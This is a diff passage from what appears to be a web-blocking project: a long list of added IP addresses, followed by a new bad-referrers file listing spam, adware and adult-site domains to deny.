+8.217.254.174
+8.217.3.8
+8.217.45.128
+8.217.86.49
+8.218.0.152
+8.218.10.30
+8.218.102.174
+8.218.107.73
+8.218.115.242
+8.218.12.181
+8.218.133.9
+8.218.15.254
+8.218.166.108
+8.218.177.5
+8.218.201.84
+8.218.203.129
+8.218.220.42
+8.218.89.123
+8.219.120.50
+8.219.147.10
+8.219.148.168
+8.219.157.124
+8.219.157.156
+8.219.163.225
+8.219.164.91
+8.219.168.69
+8.219.176.16
+8.219.181.180
+8.219.182.10
+8.219.189.216
+8.219.208.138
+8.219.209.122
+8.219.216.114
+8.219.222.66
+8.219.230.175
+8.219.231.242
+8.219.243.250
+8.219.246.0
+8.219.248.225
+8.219.252.228
+8.219.253.14
+8.219.254.129
+8.219.4.1
+8.219.48.65
+8.219.59.96
+8.219.61.177
+8.219.71.230
+8.219.8.175
+8.219.8.46
+8.219.9.139
+8.219.94.62
+8.219.99.214
+8.220.201.94
+8.220.210.24
+8.220.219.161
+8.221.136.154
+8.221.136.170
+8.221.136.235
+8.221.136.246
+8.221.136.6
+8.221.136.98
+8.221.137.163
+8.221.137.196
+8.221.137.208
+8.221.137.226
+8.221.137.58
+8.221.138.102
+8.221.138.135
+8.221.138.209
+8.221.138.213
+8.221.138.237
+8.221.139.116
+8.221.139.21
+8.221.139.48
+8.221.139.8
+8.221.140.212
+8.221.140.220
+8.221.140.221
+8.221.140.46
+8.221.140.90
+8.221.141.128
+8.221.141.131
+8.221.141.145
+8.221.141.164
+8.221.141.167
+8.221.141.179
+8.221.141.183
+8.221.141.186
+8.221.141.224
+8.221.141.254
+8.221.141.33
+8.221.141.40
+8.221.142.106
+8.221.142.108
+8.221.142.130
+8.222.128.242
+8.222.138.77
+8.222.147.160
+8.222.148.47
+8.222.157.113
+8.222.158.165
+8.222.160.62
+8.222.163.23
+8.222.164.209
+8.222.165.81
+8.222.171.149
+8.222.172.121
+8.222.173.158
+8.222.175.173
+8.222.181.172
+8.222.189.128
+8.222.233.111
+8.242.175.222
+8.38.119.48
+80.103.63.114
+80.104.209.141
+80.107.50.128
+80.112.141.230
+80.116.50.50
+80.13.113.217
+80.13.153.140
+80.13.26.200
+80.151.154.196
+80.153.242.194
+80.158.31.3
+80.191.247.45
+80.216.42.99
+80.217.102.180
+80.217.109.85
+80.227.99.162
+80.229.18.62
+80.232.244.53
+80.233.77.125
+80.233.77.136
+80.242.208.68
+80.244.41.220
+80.251.218.164
+80.253.31.232
+80.28.122.97
+80.40.124.119
+80.40.31.193
+80.66.75.106
+80.66.75.186
+80.66.75.57
+80.66.76.121
+80.66.76.130
+80.66.76.134
+80.66.77.235
+80.66.83.114
+80.66.83.212
+80.66.83.46
+80.66.83.47
+80.66.83.48
+80.66.83.49
+80.66.89.184
+80.67.167.81
+80.67.172.162
+80.68.7.50
+80.75.212.46
+80.75.212.9
+80.78.25.16
+80.82.65.14
+80.82.70.132
+80.82.70.133
+80.82.77.139
+80.82.77.144
+80.82.77.202
+80.82.77.33
+80.85.241.43
+80.85.84.75
+80.85.87.72
+80.87.195.165
+80.89.193.5
+80.94.92.117
+80.94.92.139
+80.94.92.14
+80.94.93.187
+80.94.95.217
+80.94.95.226
+80.94.95.233
+80.94.95.249
+80.94.95.81
+81.0.165.175
+81.10.17.49
+81.10.26.13
+81.12.30.24
+81.133.106.57
+81.145.49.186
+81.161.238.160
+81.161.238.93
+81.161.238.94
+81.161.238.95
+81.161.238.97
+81.166.142.226
+81.168.89.21
+81.17.19.66
+81.17.25.50
+81.17.94.226
+81.17.96.69
+81.182.248.113
+81.182.253.185
+81.19.135.100
+81.19.137.162
+81.190.16.64
+81.190.48.5
+81.192.46.38
+81.192.46.45
+81.192.46.48
+81.192.46.49
+81.192.87.130
+81.198.106.49
+81.211.72.167
+81.214.39.81
+81.214.84.178
+81.215.211.182
+81.22.51.64
+81.224.147.83
+81.225.89.235
+81.227.132.103
+81.230.55.194
+81.231.171.25
+81.232.7.146
+81.234.146.158
+81.237.179.58
+81.247.108.128
+81.28.167.30
+81.30.215.78
+81.68.75.162
+81.69.23.141
+81.69.23.155
+81.70.156.89
+81.70.166.44
+81.70.205.76
+81.70.208.164
+81.70.252.139
+81.70.27.122
+81.70.40.202
+81.70.40.35
+81.71.88.89
+81.88.196.117
+81.94.69.183
+81.94.69.93
+81.95.232.247
+81.95.236.44
+82.102.147.199
+82.102.19.90
+82.112.237.110
+82.115.223.115
+82.134.30.194
+82.137.193.252
+82.138.113.24
+82.142.13.233
+82.144.144.59
+82.146.57.237
+82.150.160.249
+82.156.123.236
+82.156.177.193
+82.156.178.118
+82.156.184.42
+82.156.78.109
+82.157.137.41
+82.157.181.190
+82.157.193.14
+82.157.208.10
+82.157.22.199
+82.157.238.134
+82.157.247.165
+82.157.52.140
+82.157.63.72
+82.157.80.60
+82.165.110.213
+82.165.198.169
+82.180.145.48
+82.180.146.226
+82.193.121.147
+82.193.122.91
+82.196.3.179
+82.196.9.140
+82.197.69.243
+82.197.71.235
+82.197.95.153
+82.199.197.245
+82.200.161.178
+82.200.65.218
+82.207.8.154
+82.207.8.194
+82.207.8.198
+82.207.8.202
+82.207.8.218
+82.207.8.242
+82.207.9.150
+82.208.23.192
+82.222.254.50
+82.223.46.174
+82.46.16.199
+82.5.144.219
+82.58.41.244
+82.64.186.234
+82.64.62.101
+82.65.118.203
+82.65.183.225
+82.65.197.203
+82.65.230.176
+82.65.43.136
+82.66.160.103
+82.66.191.11
+82.66.206.119
+82.67.7.178
+82.78.246.104
+82.84.122.203
+83.12.113.122
+83.136.176.12
+83.171.110.159
+83.191.161.179
+83.209.18.18
+83.222.190.106
+83.222.190.110
+83.222.190.114
+83.222.190.118
+83.222.190.122
+83.222.190.190
+83.222.190.206
+83.222.190.214
+83.222.190.42
+83.222.190.46
+83.222.190.50
+83.222.190.58
+83.222.190.66
+83.222.190.70
+83.222.190.82
+83.222.190.90
+83.222.190.94
+83.222.191.130
+83.222.191.134
+83.222.191.150
+83.222.191.154
+83.222.191.158
+83.222.191.42
+83.222.191.62
+83.222.191.66
+83.222.191.70
+83.222.191.86
+83.222.191.90
+83.233.56.81
+83.235.21.125
+83.239.84.130
+83.239.99.110
+83.243.192.38
+83.249.107.21
+83.253.120.211
+83.253.59.118
+83.254.230.160
+83.254.249.239
+83.254.254.59
+83.255.9.170
+83.3.151.42
+83.50.160.8
+83.69.230.5
+83.97.73.245
+83.97.73.43
+84.1.29.224
+84.15.194.90
+84.20.50.177
+84.204.2.136
+84.205.244.133
+84.22.147.211
+84.220.232.239
+84.226.72.131
+84.228.166.53
+84.231.194.77
+84.238.92.245
+84.239.16.162
+84.239.31.13
+84.247.146.45
+84.247.172.240
+84.39.250.160
+84.42.28.190
+84.52.103.234
+84.53.218.106
+84.54.115.46
+84.54.64.50
+84.9.58.136
+85.105.144.118
+85.118.0.124
+85.119.122.23
+85.12.240.14
+85.133.204.221
+85.133.233.5
+85.143.174.31
+85.159.164.28
+85.172.12.254
+85.174.139.107
+85.175.217.106
+85.18.236.229
+85.185.64.219
+85.187.218.236
+85.190.254.105
+85.192.41.186
+85.192.56.68
+85.192.60.137
+85.192.60.158
+85.192.60.160
+85.192.61.181
+85.195.234.238
+85.198.9.170
+85.208.253.54
+85.208.96.195
+85.208.96.197
+85.209.11.117
+85.209.11.254
+85.209.11.27
+85.209.11.71
+85.209.11.73
+85.209.11.75
+85.209.11.79
+85.209.11.89
+85.209.11.99
+85.21.223.134
+85.215.179.36
+85.215.191.27
+85.216.5.152
+85.221.19.7
+85.221.48.115
+85.236.10.230
+85.237.32.109
+85.237.44.48
+85.237.57.200
+85.239.232.221
+85.239.33.196
+85.24.168.235
+85.24.208.234
+85.24.208.249
+85.24.208.254
+85.24.243.93
+85.245.107.230
+85.247.2.222
+85.250.8.177
+85.255.88.12
+85.26.138.26
+85.28.47.202
+85.31.47.120
+85.31.47.22
+85.31.47.34
+85.31.47.40
+85.31.47.7
+85.44.145.73
+85.69.178.104
+85.70.45.245
+85.73.232.219
+85.85.196.35
+85.9.102.65
+85.90.119.34
+85.95.166.40
+86.102.131.54
+86.104.244.234
+86.104.38.239
+86.107.7.242
+86.120.216.225
+86.127.255.78
+86.159.84.26
+86.169.175.45
+86.19.77.170
+86.200.3.186
+86.57.138.164
+86.59.236.63
+86.60.233.103
+86.62.88.227
+86.65.168.139
+86.98.17.26
+86.99.9.62
+87.101.135.122
+87.103.126.54
+87.106.188.89
+87.106.199.212
+87.118.140.12
+87.120.112.197
+87.120.112.202
+87.120.112.220
+87.120.112.253
+87.120.113.135
+87.120.113.139
+87.120.113.188
+87.120.113.203
+87.120.113.230
+87.120.113.238
+87.120.113.248
+87.120.113.28
+87.120.113.38
+87.120.114.12
+87.120.114.147
+87.120.114.156
+87.120.114.171
+87.120.115.119
+87.120.115.16
+87.120.115.19
+87.120.115.48
+87.120.116.167
+87.120.116.228
+87.120.116.81
+87.120.117.177
+87.120.117.182
+87.120.117.184
+87.120.117.29
+87.120.117.84
+87.120.126.145
+87.120.126.80
+87.120.166.231
+87.120.166.244
+87.120.67.149
+87.121.78.20
+87.121.86.115
+87.121.86.13
+87.121.86.14
+87.121.86.40
+87.121.86.64
+87.121.86.84
+87.121.86.85
+87.121.86.87
+87.157.102.84
+87.16.91.217
+87.201.127.149
+87.227.13.86
+87.227.6.3
+87.227.64.114
+87.229.84.220
+87.236.176.10
+87.236.176.100
+87.236.176.101
+87.236.176.102
+87.236.176.103
+87.236.176.105
+87.236.176.11
+87.236.176.110
+87.236.176.111
+87.236.176.112
+87.236.176.113
+87.236.176.114
+87.236.176.115
+87.236.176.116
+87.236.176.12
+87.236.176.120
+87.236.176.121
+87.236.176.122
+87.236.176.123
+87.236.176.126
+87.236.176.127
+87.236.176.128
+87.236.176.131
+87.236.176.134
+87.236.176.135
+87.236.176.136
+87.236.176.139
+87.236.176.14
+87.236.176.140
+87.236.176.142
+87.236.176.143
+87.236.176.145
+87.236.176.147
+87.236.176.149
+87.236.176.15
+87.236.176.151
+87.236.176.152
+87.236.176.153
+87.236.176.155
+87.236.176.157
+87.236.176.158
+87.236.176.159
+87.236.176.16
+87.236.176.160
+87.236.176.163
+87.236.176.164
+87.236.176.165
+87.236.176.167
+87.236.176.168
+87.236.176.169
+87.236.176.17
+87.236.176.170
+87.236.176.172
+87.236.176.176
+87.236.176.177
+87.236.176.179
+87.236.176.180
+87.236.176.182
+87.236.176.184
+87.236.176.185
+87.236.176.187
+87.236.176.189
+87.236.176.19
+87.236.176.191
+87.236.176.193
+87.236.176.197
+87.236.176.198
+87.236.176.199
+87.236.176.2
+87.236.176.201
+87.236.176.204
+87.236.176.208
+87.236.176.209
+87.236.176.213
+87.236.176.214
+87.236.176.217
+87.236.176.219
+87.236.176.220
+87.236.176.224
+87.236.176.227
+87.236.176.228
+87.236.176.23
+87.236.176.230
+87.236.176.231
+87.236.176.232
+87.236.176.235
+87.236.176.237
+87.236.176.238
+87.236.176.239
+87.236.176.24
+87.236.176.240
+87.236.176.241
+87.236.176.243
+87.236.176.244
+87.236.176.247
+87.236.176.248
+87.236.176.253
+87.236.176.26
+87.236.176.27
+87.236.176.28
+87.236.176.32
+87.236.176.33
+87.236.176.34
+87.236.176.35
+87.236.176.36
+87.236.176.37
+87.236.176.38
+87.236.176.39
+87.236.176.4
+87.236.176.44
+87.236.176.45
+87.236.176.46
+87.236.176.48
+87.236.176.5
+87.236.176.51
+87.236.176.52
+87.236.176.54
+87.236.176.55
+87.236.176.57
+87.236.176.58
+87.236.176.59
+87.236.176.6
+87.236.176.60
+87.236.176.61
+87.236.176.62
+87.236.176.63
+87.236.176.64
+87.236.176.65
+87.236.176.69
+87.236.176.7
+87.236.176.70
+87.236.176.71
+87.236.176.73
+87.236.176.74
+87.236.176.75
+87.236.176.78
+87.236.176.79
+87.236.176.80
+87.236.176.81
+87.236.176.84
+87.236.176.9
+87.236.176.90
+87.236.176.91
+87.236.176.94
+87.236.176.96
+87.236.176.99
+87.236.233.66
+87.247.158.120
+87.248.1.199
+87.248.226.146
+87.251.102.94
+87.251.67.119
+87.251.67.151
+87.251.75.136
+87.251.75.77
+87.253.68.149
+87.255.193.50
+87.5.195.113
+87.63.95.23
+87.64.189.249
+87.64.71.57
+87.76.61.125
+87.98.134.245
+87.98.173.252
+87.98.243.61
+88.103.187.12
+88.119.251.158
+88.121.9.222
+88.126.161.215
+88.129.112.124
+88.129.112.6
+88.129.112.88
+88.131.165.45
+88.135.36.52
+88.142.46.185
+88.147.30.59
+88.151.32.107
+88.151.32.87
+88.177.165.19
+88.201.189.216
+88.204.204.78
+88.205.172.170
+88.208.224.57
+88.214.25.16
+88.244.72.64
+88.247.149.40
+88.247.52.140
+88.250.31.32
+88.80.20.49
+88.80.20.86
+88.86.223.36
+88.87.92.77
+88.99.91.209
+89.10.212.19
+89.101.238.143
+89.107.10.145
+89.107.10.9
+89.123.129.209
+89.144.187.114
+89.150.35.56
+89.150.40.56
+89.154.72.49
+89.160.6.62
+89.163.140.223
+89.163.148.212
+89.163.152.211
+89.165.1.36
+89.168.109.189
+89.168.127.7
+89.169.52.222
+89.169.52.77
+89.171.34.5
+89.179.33.126
+89.183.192.58
+89.185.85.104
+89.185.85.253
+89.185.85.56
+89.188.76.72
+89.188.76.74
+89.189.148.122
+89.190.156.158
+89.190.66.40
+89.207.218.10
+89.208.103.230
+89.208.104.147
+89.208.104.210
+89.208.105.222
+89.208.105.70
+89.208.106.189
+89.208.106.94
+89.208.107.170
+89.208.107.187
+89.208.14.36
+89.208.97.186
+89.208.97.92
+89.211.188.252
+89.213.11.115
+89.216.47.154
+89.218.185.66
+89.22.226.96
+89.23.212.52
+89.232.73.146
+89.233.247.181
+89.234.157.254
+89.235.116.181
+89.236.112.100
+89.236.226.128
+89.248.163.200
+89.248.163.26
+89.248.163.49
+89.248.163.73
+89.248.167.131
+89.248.168.227
+89.248.172.16
+89.248.172.92
+89.249.246.115
+89.252.140.80
+89.252.184.53
+89.252.190.72
+89.253.223.78
+89.35.14.168
+89.37.95.34
+89.46.34.86
+89.47.200.91
+89.58.26.216
+89.58.41.156
+89.58.41.251
+89.77.160.8
+89.97.218.142
+90.126.49.76
+90.129.232.29
+90.133.20.24
+90.138.7.124
+90.151.171.106
+90.154.253.122
+90.160.139.163
+90.161.217.228
+90.164.51.187
+90.176.67.60
+90.177.97.26
+90.187.221.21
+90.188.251.32
+90.225.32.79
+90.226.2.8
+90.229.175.86
+90.239.30.219
+90.63.170.8
+90.64.150.101
+90.84.176.109
+90.84.224.113
+91.103.252.1
+91.103.252.103
+91.103.252.144
+91.103.252.166
+91.103.252.185
+91.103.252.198
+91.103.252.244
+91.103.252.47
+91.103.253.39
+91.103.253.62
+91.103.253.8
+91.117.253.126
+91.121.168.91
+91.121.2.118
+91.122.59.23
+91.122.62.147
+91.132.118.38
+91.132.146.181
+91.132.254.105
+91.134.185.90
+91.134.243.207
+91.134.248.235
+91.134.248.249
+91.134.90.177
+91.135.103.7
+91.135.108.160
+91.142.222.180
+91.144.130.67
+91.144.158.231
+91.144.162.41
+91.144.20.198
+91.144.21.170
+91.145.44.44
+91.147.93.36
+91.147.93.45
+91.149.55.57
+91.151.128.225
+91.151.88.144
+91.175.44.218
+91.179.244.76
+91.185.237.240
+91.191.209.158
+91.191.209.198
+91.191.209.202
+91.191.209.206
+91.191.209.218
+91.191.209.222
+91.191.209.54
+91.192.44.36
+91.196.54.125
+91.200.100.161
+91.203.110.223
+91.203.177.71
+91.205.104.28
+91.205.104.59
+91.205.128.170
+91.205.219.185
+91.206.169.21
+91.206.26.26
+91.206.32.120
+91.207.115.249
+91.207.181.124
+91.212.166.37
+91.213.99.45
+91.215.136.69
+91.219.236.80
+91.219.237.56
+91.223.169.83
+91.223.169.88
+91.227.18.79
+91.229.118.192
+91.232.120.102
+91.232.29.206
+91.235.247.80
+91.236.168.249
+91.238.181.20
+91.238.181.21
+91.238.181.22
+91.238.181.23
+91.238.181.24
+91.238.181.31
+91.238.181.32
+91.238.181.33
+91.238.181.34
+91.238.181.35
+91.238.181.71
+91.238.230.148
+91.238.69.91
+91.239.157.187
+91.239.19.66
+91.240.118.215
+91.240.53.234
+91.240.61.14
+91.242.27.65
+91.243.50.206
+91.244.113.188
+91.246.114.193
+91.74.41.96
+91.74.43.17
+91.77.163.86
+91.82.233.3
+91.90.121.155
+91.92.109.43
+91.92.120.31
+91.92.199.36
+91.92.240.101
+91.92.243.156
+91.92.250.99
+91.93.203.239
+92.106.201.70
+92.106.80.12
+92.118.39.133
+92.118.39.205
+92.118.39.213
+92.118.39.36
+92.118.39.37
+92.118.39.83
+92.118.39.84
+92.118.77.3
+92.131.162.246
+92.154.95.236
+92.204.139.118
+92.204.144.151
+92.204.175.84
+92.205.108.83
+92.205.176.4
+92.205.182.254
+92.205.225.229
+92.222.10.235
+92.222.180.245
+92.222.181.145
+92.223.191.126
+92.241.104.206
+92.246.139.107
+92.246.84.133
+92.246.84.15
+92.249.48.232
+92.255.195.59
+92.255.196.185
+92.255.85.107
+92.255.85.164
+92.255.85.253
+92.26.84.52
+92.27.101.99
+92.27.157.252
+92.33.220.122
+92.38.241.231
+92.42.96.51
+92.44.62.232
+92.47.46.174
+92.51.115.202
+92.51.2.55
+92.51.2.90
+92.52.146.18
+92.52.165.208
+92.53.96.106
+92.53.96.134
+92.53.96.137
+92.53.96.211
+92.53.96.245
+92.54.60.100
+92.55.190.215
+92.62.131.124
+92.63.197.210
+92.63.206.99
+92.63.96.227
+92.83.137.105
+92.92.43.98
+93.113.63.124
+93.113.63.8
+93.118.106.118
+93.118.154.165
+93.120.240.202
+93.123.109.142
+93.123.194.205
+93.123.39.109
+93.123.39.141
+93.123.39.144
+93.123.39.28
+93.123.39.61
+93.123.39.73
+93.123.39.81
+93.123.39.97
+93.123.85.105
+93.123.85.130
+93.123.85.210
+93.126.21.4
+93.144.110.178
+93.144.21.202
+93.144.210.22
+93.144.221.247
+93.144.224.132
+93.144.94.78
+93.146.101.181
+93.146.116.2
+93.146.158.152
+93.146.34.214
+93.147.123.28
+93.147.33.86
+93.148.158.37
+93.148.188.54
+93.148.45.232
+93.148.86.193
+93.149.162.93
+93.149.175.198
+93.149.215.211
+93.15.114.151
+93.151.173.34
+93.151.216.124
+93.151.237.201
+93.155.242.87
+93.160.174.27
+93.174.93.12
+93.174.95.106
+93.182.160.222
+93.182.160.223
+93.183.131.53
+93.184.148.3
+93.185.73.178
+93.190.138.132
+93.42.211.26
+93.48.136.80
+93.65.107.27
+93.65.141.184
+93.65.142.25
+93.65.81.53
+93.65.86.254
+93.65.9.185
+93.66.11.181
+93.66.155.11
+93.66.159.163
+93.66.198.97
+93.66.224.6
+93.66.231.244
+93.66.29.12
+93.66.68.184
+93.66.69.120
+93.67.149.106
+93.67.39.69
+93.67.51.14
+93.67.94.163
+93.70.11.205
+93.70.114.52
+93.70.48.32
+93.70.5.243
+93.71.135.152
+93.71.62.177
+93.93.115.178
+94.102.125.123
+94.102.49.119
+94.102.49.190
+94.102.49.193
+94.102.49.238
+94.102.49.71
+94.102.51.218
+94.103.125.176
+94.103.125.73
+94.127.212.198
+94.131.203.54
+94.131.211.168
+94.131.99.17
+94.136.187.173
+94.139.165.200
+94.140.210.134
+94.141.120.106
+94.141.120.147
+94.141.120.212
+94.141.120.232
+94.141.120.236
+94.141.120.28
+94.141.120.36
+94.141.120.39
+94.141.120.5
+94.141.120.58
+94.141.120.65
+94.141.120.86
+94.141.3.38
+94.142.138.120
+94.154.172.51
+94.156.104.115
+94.156.104.157
+94.156.104.166
+94.156.104.177
+94.156.104.51
+94.156.104.53
+94.156.104.54
+94.156.104.56
+94.156.104.58
+94.156.104.59
+94.156.105.15
+94.156.105.167
+94.156.16.54
+94.156.167.13
+94.156.167.147
+94.156.167.193
+94.156.167.205
+94.156.167.206
+94.156.167.76
+94.156.167.77
+94.156.167.78
+94.156.167.81
+94.156.167.83
+94.156.167.93
+94.156.177.10
+94.156.177.121
+94.156.177.124
+94.156.177.127
+94.156.177.13
+94.156.177.163
+94.156.177.18
+94.156.177.19
+94.156.177.21
+94.156.177.22
+94.156.177.29
+94.156.177.3
+94.156.177.31
+94.156.177.34
+94.156.177.35
+94.156.177.37
+94.156.177.43
+94.156.177.44
+94.156.177.5
+94.156.177.64
+94.156.177.77
+94.156.177.8
+94.156.177.80
+94.156.177.95
+94.156.64.169
+94.159.113.18
+94.177.106.38
+94.179.107.98
+94.179.109.66
+94.179.133.22
+94.181.73.176
+94.182.137.45
+94.182.171.4
+94.182.197.178
+94.19.191.17
+94.20.154.159
+94.204.109.116
+94.204.238.171
+94.204.45.174
+94.204.66.222
+94.204.76.14
+94.205.219.157
+94.207.16.191
+94.207.22.124
+94.228.162.3
+94.228.163.98
+94.228.169.65
+94.23.123.1
+94.23.145.155
+94.23.155.152
+94.230.208.147
+94.237.3.20
+94.249.69.90
+94.254.0.234
+94.26.228.213
+94.45.209.23
+94.52.209.104
+94.53.155.34
+94.61.7.100
+94.63.229.20
+94.64.246.65
+94.65.79.182
+94.70.152.191
+94.72.115.107
+94.73.219.205
+94.76.197.82
+94.76.82.57
+95.105.113.109
+95.105.113.224
+95.105.73.5
+95.128.69.10
+95.130.227.131
+95.132.255.44
+95.135.175.219
+95.139.65.111
+95.141.228.9
+95.143.172.207
+95.152.60.122
+95.153.247.199
+95.154.85.230
+95.155.115.196
+95.155.44.179
+95.160.28.219
+95.160.47.156
+95.165.29.72
+95.165.5.18
+95.165.65.191
+95.167.133.86
+95.167.225.76
+95.167.53.90
+95.167.59.170
+95.173.161.230
+95.173.191.84
+95.173.2.140
+95.174.104.112
+95.174.124.39
+95.174.99.133
+95.181.128.194
+95.181.86.2
+95.188.91.101
+95.214.27.136
+95.214.27.14
+95.214.27.16
+95.214.27.166
+95.214.27.168
+95.214.27.169
+95.214.27.170
+95.214.27.27
+95.214.27.29
+95.214.27.30
+95.214.27.31
+95.214.27.32
+95.214.27.33
+95.214.27.38
+95.214.27.39
+95.214.27.40
+95.214.27.41
+95.214.27.9
+95.214.53.45
+95.214.55.138
+95.214.55.43
+95.217.109.26
+95.221.134.193
+95.24.3.51
+95.250.148.152
+95.255.108.3
+95.38.106.182
+95.38.197.204
+95.47.149.88
+95.52.220.109
+95.56.227.226
+95.57.104.252
+95.58.255.251
+95.66.247.151
+95.7.78.160
+95.79.108.51
+95.80.230.87
+95.81.93.99
+95.84.148.71
+95.84.217.221
+95.85.112.170
+95.85.114.218
+95.85.47.10
+95.87.246.71
+95.87.248.223
+95.9.133.236
+95.9.245.47
+95.9.54.244
+95.90.242.212
+95.90.54.167
+95.90.93.96
+95.91.237.231
+95.92.172.88
+96.1.40.151
+96.10.144.195
+96.10.249.114
+96.126.127.169
+96.232.248.246
+96.249.234.242
+96.67.216.91
+96.67.59.65
+96.69.13.140
+96.77.117.189
+96.78.175.36
+96.78.175.39
+96.78.175.41
+96.78.175.42
+96.78.175.45
+96.79.174.131
+96.79.249.93
+96.88.153.181
+97.107.135.216
+97.107.139.11
+97.107.139.196
+97.107.140.102
+97.107.141.150
+97.70.129.101
+97.79.181.188
+97.86.134.216
+98.102.148.242
+98.128.173.33
+98.13.229.218
+98.14.144.113
+98.150.86.115
+98.167.26.103
+98.177.3.82
+98.181.106.22
+98.184.108.60
+98.19.26.152
+98.20.146.226
+98.224.6.34
+98.23.233.65
+98.23.39.74
+98.232.219.29
+98.24.163.2
+98.42.204.232
+98.96.193.10
+98.96.193.11
+98.96.193.12
+98.96.193.13
+98.96.193.2
+98.96.193.27
+98.96.193.28
+98.96.193.3
+98.96.193.4
+98.96.193.50
+98.96.193.51
+98.98.57.62
diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt
new file mode 100644
index 00000000..75f087ff
--- /dev/null
+++ b/db/bad-referrers.txt
@@ -0,0 +1,7105 @@
+000free.us
+007angels.com
+00author.com
+00go.com
+00it.com
+00webcams.com
+01apple.com
+03e.info
+03p.info
+08800.top
+0912701309f8ce.com
+0c47f8422d3f.com
+0daymusic.org
+0lovespells0.blogspot.com
+0n-line.tv
+1-99seo.com
+1-free-share-buttons.com
+1000n1.ru
+1001desert.com
+1001watch.com.ua
+1008.su
+100dollars-seo.com
+100searchengines.com
+101billion.com
+101flag.ru
+101lesbian.xyz
+101raccoon.ru
+108shot.com
+10bet.com
+11235813.webzdarma.cz
+11pikachu.ru
+123any.com
+123cha.com
+123kuma.com
+123locker.com
+123movies.love
+12bet.com
+12masterov.com
+12u.info
+1314dh.com
+13tabs.com
+14b.info
+1688.com
+178evakuator178.ru
+18ps.ru
+1adult.com
+1bet.com
+1flag.co.za
+1hwy.com
+1j7740kd.website
+1kdailyprofit.me
+1kinobig.ru
+1millionusd.xyz
+1pamm.ru
+1qingdao.com
+1stat.ru
+1webmaster.ml
+1xbet4you.com
+2000k.ru
+2015god.org
+2020iscoming.info
+202ch.com
+20pascals.nl
+214jaluwobapef.cf
+21h2o.com
+2345.com
+23kw.ru
+24-ak.ru
+24videos.tv
+24x7-server-support.site
+256bit.by
+2728fb936f0.com
+273-fz.ru
+28n2gl3wfyb0.ru
+2ads.co.uk
+2daytrendingnews.com
+2drittel.de
+2girls1cup-free.com
+2itech.ru
+2kata.ru
+2nt.ru
+2pxg8bcf.top
+2rich4bitches.com
+2x2fan.ru
+3-letter-domains.net
+300richmond.co.nz
+34.gs
+3dracergames.com
+3rbseyes.com
+3th.co.in
+3w24.com
+3weekdiet.com
+3xforum.ro
+404.mn
+40cg.com
+45en.ru
+4inn.ru
+4istoshop.com
+4k-player.pl
+4kepics.com
+4kpics.rocks
+4kplayer.pl
+4pp13.com
+4rent.ru
+4replicawatch.net
+4senses.co
+4ur.click
+4ureyesonly.com
+4webmasters.com
+4webmasters.org
+5-steps-to-start-business.com
+5000-cotydzien.com
+51.la
+51unlim.ru
+55wmz.ru
+57883.net
+5elementov.ru
+5forex.ru
+5i2.net
+5kstore.com
+5tey7463.weebly.com
+5u.com
+5ws.dating-app.ru
+6128786.com
+66cpwgln.space
+6hopping.com
+70casino.online
+72-news.com
+76brighton.co.uk
+777-club.ru
+7a2rnuey1tw9ar.ru
+7fon.ru
+7makemoneyonline.com
+7minuteworkout.com
+7ooo.ru
+7search.com
+7wind.ru
+7xc4n.com
+7yue.org
+7zap.com
+83net.jp
+8558l.jobs.net
+883zy.com
+888.com
+8gold.com
+8jn.dating-app.ru
+8kisses.eu
+8lufu.com
+8si.ru
+8xv8.com
+91abcw.com
+98oi.ru
+991mostfm.co.id
+999webdesign.com
+9icmzvn6.website
+9med.net
+DomainStatsBot
+a.frcls.fr
+a.pr-cy.ru
+a14download.com
+a1security.com.ua
+a96527gi.beget.tech
+aa08daf7e13b6345e09e92f771507fa5f4.com
+aa14ab57a3339c4064bd9ae6fad7495b5f.com
+aa625d84f1587749c1ab011d6f269f7d64.com
+aa81bf391151884adfa3dd677e41f94be1.com
+aa8780bb28a1de4eb5bff33c28a218a930.com
+aa8b68101d388c446389283820863176e7.com
+aa9bd78f328a6a41279d0fad0a88df1901.com
+aa9d046aab36af4ff182f097f840430d51.com
+aaa38852e886ac4af1a3cff9b47cab6272.com
+aab94f698f36684c5a852a2ef272e031bb.com
+aac500b7a15b2646968f6bd8c6305869d7.com
+aac52006ec82a24e08b665f4db2b5013f7.com
+aad1f4acb0a373420d9b0c4202d38d94fa.com
+aadroid.net
+aanapa.ru
+aarbur.com
+aaronabel.com
+aasoldes.fr
+abbanreddy.com
+abcdefh.xyz
+abcdeg.xyz
+abcguru.xyz
+abclauncher.com
+abctoppictures.net
+abiente.ru
+above.com
+abovetherivernc.com
+absolute-s.ru
+absolutelyanalog.com
+absugars.com
+abtasty.com
+abusora.com
+abwa.tk
+academia-nsk.org
+academiacsmendoza.org
+acads.net
+acc.eu.org
+accessoires-mode.in
+acgs.tk
+acheterviagrafr24.com
+acmebtn.ml
+acortarurl.es
+actices.com
+actionnooz.com
+activecampaign.dreamhosters.com
+activepr.ru
+actulite.com
+acunetix-referrer.com
+ad-words.ru
+adamoads.com
+adanih.com
+adbetclickin.pink
+adcash.com
+adclickservice.com
+adclickthru.net
+adconscious.com
+add-add.men
+addbin.men
+addblueoff.com.ua
+addray.pro
+addtoadd.men
+adelly.bg
+adexprts.com
+adf.ly
+adhome.biz
+adidas.frwebs.fr
+adimmix.com
+adinterax.com
+adktrailmap.com
+adloads.com
+adloads.net
+adman.gr
+adman.se
+admanaerofoil.com
+admatic.com.tr
+admeasures.com
+adminshop.com
+admitad.com
+adnotbad.com
+adobereader-free.ru
+adpremium.org
+adprotect.net
+adrenalin-stk.ru
+adrunnr.com
+ads-cool.pro
+ads-seo.men
+ads.gold
+ads.tremorhub.com
+adserver-e7.com
+adservme.com
+adsfresh.men
+adsland.men
+adsloads.com
+adsref.men
+adssafeprotected.com
+adtech.de
+adtech.fr
+adtech.us
+adtiger.tk
+adtology.com
+adult-shop.com.ua
+adult3dgames.com
+adultactioncam.com
+adultfriendfinder.com
+adultfullhd.com
+adultgalls.com
+adultmeetonline.info
+adultnet.in
+adultwebhosting.info
+advancedcleaner.com
+advancedmassagebysara.com
+advancedsoftwaresupport.com
+adventureparkcostarica.com
+adverster.com
+advertex.info
+advertisingtag.net
+adviceforum.info
+advocatemsk.ru
+advokat-grodno.by
+advokateg.ru
+advokateg.xyz
+adzerg.com
+adzpower.com
+aero2.ru
+aerogo.com
+affiliate-fr.com
+affordablewebsitesandmobileapps.com
+affrh2015.com
+afftrack001.com
+afmuseum.com
+afora.ru
+afslankpillen2017nl.eu
+agadelha.com.br
+agahinameh.com
+agapovdg.ru
+agardomains.com
+agecheckadult.com
+ageofclones.com
+aghanyna.com
+agreda.pluto.ro
+agroeconom.kz
+agysya.ru
